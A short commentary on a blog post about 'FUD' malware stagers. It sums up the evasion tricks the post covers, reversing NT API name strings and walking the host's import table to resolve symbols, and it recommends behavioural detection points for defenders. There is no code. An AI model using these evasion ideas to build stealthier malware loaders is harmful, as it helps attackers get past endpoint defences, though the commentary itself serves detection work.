The g3tsyst3m post is a useful reminder that FUD is not a property of a payload — it is a property of a static analysis pipeline at a moment in time. Both stagers will eventually be detected as classifiers retrain on this exact pattern (string reversal of NT-layer API names is a strong signal once the model knows to look for it). What makes the post valuable is the mechanical clarity of the IAT-walking trick in Variant #2: it shows how much of the static surface vanishes when you treat the host process’s loader as your symbol-resolution oracle. For defenders the same clarity points exactly where to instrument — behavioural detection of RWX-from-interpreter, NT-API-from-interpreter, and private-region execution catches both variants regardless of how the strings are spelt on disk.
Original text: “Creative approaches to coding FUD Stagers” by R.B.C. (g3tsyst3m) at G3tSyst3m’s Infosec Blog.

